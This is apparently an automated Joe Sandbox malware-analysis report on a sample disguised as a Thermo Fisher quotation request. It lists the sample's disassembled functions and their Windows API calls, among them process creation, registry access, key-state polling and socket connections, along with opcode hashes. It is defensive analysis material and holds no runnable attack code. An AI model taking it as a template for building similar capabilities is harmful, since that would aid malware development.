                                                                • Part of subcall function 0063C82D: GetCurrentThreadId.KERNEL32 ref: 0063C864
                                                                • Part of subcall function 0063C82D: AttachThreadInput.USER32(00000000), ref: 0063C86B
                                                              • GetFocus.USER32 ref: 0063CA05
                                                                • Part of subcall function 0063C876: GetParent.USER32(?), ref: 0063C884
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0063CA4E
                                                              • EnumChildWindows.USER32(?,0063CAC4), ref: 0063CA76
                                                              • __swprintf.LIBCMT ref: 0063CA90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                              • String ID: %s%d
                                                              • API String ID: 3187004680-1110647743
                                                              • Opcode ID: 11e9a5d5818ca1771591452cedb18b58a1cf1b549be473d903e9266c50090de6
                                                              • Instruction ID: b3babfa62d58d8ff99490d0b7f580a71a746cf26974854e07e51b30d76e100fe
                                                              • Opcode Fuzzy Hash: 11e9a5d5818ca1771591452cedb18b58a1cf1b549be473d903e9266c50090de6
                                                              • Instruction Fuzzy Hash: A61172716002097BCF55BF64DC85FEA3B7EAF44714F00806AFA08BA182DB709645DBB4
                                                              APIs
                                                              • __lock.LIBCMT ref: 00627AD8
                                                                • Part of subcall function 00627CF4: __mtinitlocknum.LIBCMT ref: 00627D06
                                                                • Part of subcall function 00627CF4: EnterCriticalSection.KERNEL32(00000000,?,00627ADD,0000000D), ref: 00627D1F
                                                              • InterlockedIncrement.KERNEL32(?), ref: 00627AE5
                                                              • __lock.LIBCMT ref: 00627AF9
                                                              • ___addlocaleref.LIBCMT ref: 00627B17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                              • String ID: `h
                                                              • API String ID: 1687444384-218911116
                                                              • Opcode ID: 370e1a6e1a4a15da6f429087894c228a928713523e35a8a62aff904840c8c298
                                                              • Instruction ID: 16dc1bb4e815e9879ec07fc51d658f0a95d8abced537fe42cfd55caf0521f204
                                                              • Opcode Fuzzy Hash: 370e1a6e1a4a15da6f429087894c228a928713523e35a8a62aff904840c8c298
                                                              • Instruction Fuzzy Hash: 67016171504B109FD760DF75E905749BBF2AF50321F20490EA496972A1CB70A684CF55
                                                              APIs
                                                              • _memset.LIBCMT ref: 0066E33D
                                                              • _memset.LIBCMT ref: 0066E34C
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006C3D00,006C3D44), ref: 0066E37B
                                                              • CloseHandle.KERNEL32 ref: 0066E38D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID: D=l
                                                              • API String ID: 3277943733-2789120451
                                                              • Opcode ID: ca474571870524d945687e3b952abf35fc6c06ab1542d9490b56465c23d1ba71
                                                              • Instruction ID: 3fec747c792c2ebbd858ff55af9870fe54664813bade937f8f7586ba42a430b1
                                                              • Opcode Fuzzy Hash: ca474571870524d945687e3b952abf35fc6c06ab1542d9490b56465c23d1ba71
                                                              • Instruction Fuzzy Hash: C7F05EF5540324BAF3102B60AC49FB77E6EDF04754F009425BE0AE62A2D776AE0087B8
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006619F3
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00661A26
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00661B49
                                                              • CloseHandle.KERNEL32(?), ref: 00661BBF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: b7c0faf060f268f8ae02ceb91f72b2b2164d7933cb2edc012c8ba3448a4da1e8
                                                              • Instruction ID: a221404d85a1bfa6dab5f804d82ee7573224c685256643cf861648afa5f45858
                                                              • Opcode Fuzzy Hash: b7c0faf060f268f8ae02ceb91f72b2b2164d7933cb2edc012c8ba3448a4da1e8
                                                              • Instruction Fuzzy Hash: EA8194B0600205ABDF54DF64C896BEDBBE6BF05720F188459FA05AF3C2D7B4A941CB94
                                                              APIs
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0066E1D5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0066E20D
                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 0066E248
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0066E269
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0066E281
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                              • String ID:
                                                              • API String ID: 3188977179-0
                                                              • Opcode ID: 3418bf08cbb872eecc8d9828a338faf92f7811c2854f561dca1f8de3037496df
                                                              • Instruction ID: 8df02901b3555921b846a4d55e8e8fd32ea89ffac7d5c8b50f34946795ca75e7
                                                              • Opcode Fuzzy Hash: 3418bf08cbb872eecc8d9828a338faf92f7811c2854f561dca1f8de3037496df
                                                              • Instruction Fuzzy Hash: 58618138A00204AFDB25CF58C855FFABBBBEF4A300F144159F9599B3A1C772A951DB10
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00641CB4
                                                              • VariantClear.OLEAUT32(00000013), ref: 00641D26
                                                              • VariantClear.OLEAUT32(00000000), ref: 00641D81
                                                              • VariantClear.OLEAUT32(?), ref: 00641DF8
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00641E26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              • Opcode ID: 8c18c91d4de652d2858a3a535059bc0ab6b4e66b6da6ce8b1ef1360b5542f55f
                                                              • Instruction ID: 9f15c1ab694b67172f156cd7623b6fd186b1d6348461e660614d61ed8b2dc2a5
                                                              • Opcode Fuzzy Hash: 8c18c91d4de652d2858a3a535059bc0ab6b4e66b6da6ce8b1ef1360b5542f55f
                                                              • Instruction Fuzzy Hash: E05147B5A00209AFDB14CF58C880AAAB7FAFF4D314B158559ED59DB340E730EA51CFA0
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006606EE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0066077D
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0066079B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 006607E1
                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 006607FB
                                                                • Part of subcall function 0061E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0064A574,?,?,00000000,00000008), ref: 0061E675
                                                                • Part of subcall function 0061E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0064A574,?,?,00000000,00000008), ref: 0061E699
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: ab67289076a11fc0ac4000732fcb3d91c537b7186db2947ac6d86d6d6ad95b48
                                                              • Instruction ID: 191d97571c81dbae0bdc81f6590c161e03e10db6d9c735a83d87c401981bf9d9
                                                              • Opcode Fuzzy Hash: ab67289076a11fc0ac4000732fcb3d91c537b7186db2947ac6d86d6d6ad95b48
                                                              • Instruction Fuzzy Hash: 12517C75A00205EFDB04EFA8C480DEEB7B6BF48310B048169EA55AB392DB30ED41CF94
                                                              APIs
                                                                • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00662EEF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00662F2E
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00662F75
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00662FA1
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00662FAE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              • Opcode ID: eaa9cc5fb8c9010e07d7b4422e757a16fb02ae9b33119b03f78b9f73bb3e657d
                                                              • Instruction ID: 068252b19bd1625c5467b81ea3a8a2f832d4b720a594db86981a9f28e2929b3f
                                                              • Opcode Fuzzy Hash: eaa9cc5fb8c9010e07d7b4422e757a16fb02ae9b33119b03f78b9f73bb3e657d
                                                              • Instruction Fuzzy Hash: 79518B71248205AFC748EF64C891EABB7FAFF88314F00892DF595972A1DB70E905CB56
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 074517803679dc364b0b294edd65a9a27b9d9fca986451d23147e12bd94e90d2
                                                              • Instruction ID: 13153a740ccafdaa0dea6b60154b7aca24052c44c048ce43f94e814cdac4b614
                                                              • Opcode Fuzzy Hash: 074517803679dc364b0b294edd65a9a27b9d9fca986451d23147e12bd94e90d2
                                                              • Instruction Fuzzy Hash: BC419279900904BFD710DF68CC44FF9BB7AEF4A320F140265E999A72E1C671AD51DA60
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006512B4
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006512DD
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0065131C
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00651341
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00651349
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: abc6d71f10abe00429ac4847f8381c4f9b15eb4a5a34173ba81e72e66d102006
                                                              • Instruction ID: bdc191ed9e8b0f4bc760a681a9d65a2633f26253734e205e9e89c25eab26ec4a
                                                              • Opcode Fuzzy Hash: abc6d71f10abe00429ac4847f8381c4f9b15eb4a5a34173ba81e72e66d102006
                                                              • Instruction Fuzzy Hash: F4413C35600105DFCB45EF64C991AAEBBF6FF09310B148099E946AB3A2DB31ED41CF64
                                                              APIs
                                                              • GetCursorPos.USER32(000000FF), ref: 0061B64F
                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 0061B66C
                                                              • GetAsyncKeyState.USER32(00000001), ref: 0061B691
                                                              • GetAsyncKeyState.USER32(00000002), ref: 0061B69F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: 27430b2c71c9031235517ca912f3d558fa83befb7bb977f09cd63536acda9aeb
                                                              • Instruction ID: dd1feac3c188bcb871196f77a46e367d08a09ea1a1feaafd2440eed60589cca1
                                                              • Opcode Fuzzy Hash: 27430b2c71c9031235517ca912f3d558fa83befb7bb977f09cd63536acda9aeb
                                                              • Instruction Fuzzy Hash: BA416B31604219FFCF159F64C844AEDBBB6BF15324F24831AF82996290CB35AD94DFA1
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0063B369
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 0063B413
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0063B41B
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 0063B429
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0063B431
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: f396132fe469b4a11f279c6252ae308bb45988cea8305006f78ed3941cf92e83
                                                              • Instruction ID: de78d2a9002ce3f0b952aa048751fc7e5290fa6f7fc48f91edc993ca9b622f06
                                                              • Opcode Fuzzy Hash: f396132fe469b4a11f279c6252ae308bb45988cea8305006f78ed3941cf92e83
                                                              • Instruction Fuzzy Hash: CE31AE7190022DEBEF04CF68D94DADE7BB6EB04315F105229FA21AA2D1C3B09954CBA0
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0063DBD7
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0063DBF4
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0063DC2C
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0063DC52
                                                              • _wcsstr.LIBCMT ref: 0063DC5C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: 7093f812397160a89c39772221217099529ec4e1452eeef936510dbb219cf9c7
                                                              • Instruction ID: f699949dd1792a4154784e870f6f2ec982fa339cbc9fdba9fef991882944d28c
                                                              • Opcode Fuzzy Hash: 7093f812397160a89c39772221217099529ec4e1452eeef936510dbb219cf9c7
                                                              • Instruction Fuzzy Hash: 24210771214104BBEB159B39AC49EBB7BAEDF45750F148129F809CA191EAA1CC41D7A4
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0063BC90
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0063BCC2
                                                              • __itow.LIBCMT ref: 0063BCDA
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0063BD00
                                                              • __itow.LIBCMT ref: 0063BD11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: dcc17f9f9a9afd18e8aae136163d0a157a0298ecc7a95dab8562d19addbe94eb
                                                              • Instruction ID: d5102957c8561224f883174ce9c8bbf86308afb4e6d8544f0fa73a644df7af08
                                                              • Opcode Fuzzy Hash: dcc17f9f9a9afd18e8aae136163d0a157a0298ecc7a95dab8562d19addbe94eb
                                                              • Instruction Fuzzy Hash: E821F671740218BADB20AB649C46FDF7BABAF49310F002028FA05EB1C1EB708D4587E5
                                                              APIs
                                                                • Part of subcall function 006050E6: _wcsncpy.LIBCMT ref: 006050FA
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,006460C3), ref: 00646369
                                                              • GetLastError.KERNEL32(?,?,?,006460C3), ref: 00646374
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006460C3), ref: 00646388
                                                              • _wcsrchr.LIBCMT ref: 006463AA
                                                                • Part of subcall function 00646318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006460C3), ref: 006463E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                              • String ID:
                                                              • API String ID: 3633006590-0
                                                              • Opcode ID: 97728a98df9a82986ec862b06c774fc06d50185b72be41a7bd816a4e9de2a75f
                                                              • Instruction ID: 6e6b1d6eb93db80fb6a6ea642001fad5b0112b66fdc7107dc9bcb2ac744f98a0
                                                              • Opcode Fuzzy Hash: 97728a98df9a82986ec862b06c774fc06d50185b72be41a7bd816a4e9de2a75f
                                                              • Instruction Fuzzy Hash: 332105315042559BDB26EF78EC52FEA23AFAF173A0F102069F045C31C1EF60DD858A6A
                                                              APIs
                                                                • Part of subcall function 0065A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0065A84E
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00658BD3
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658BE2
                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00658BFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
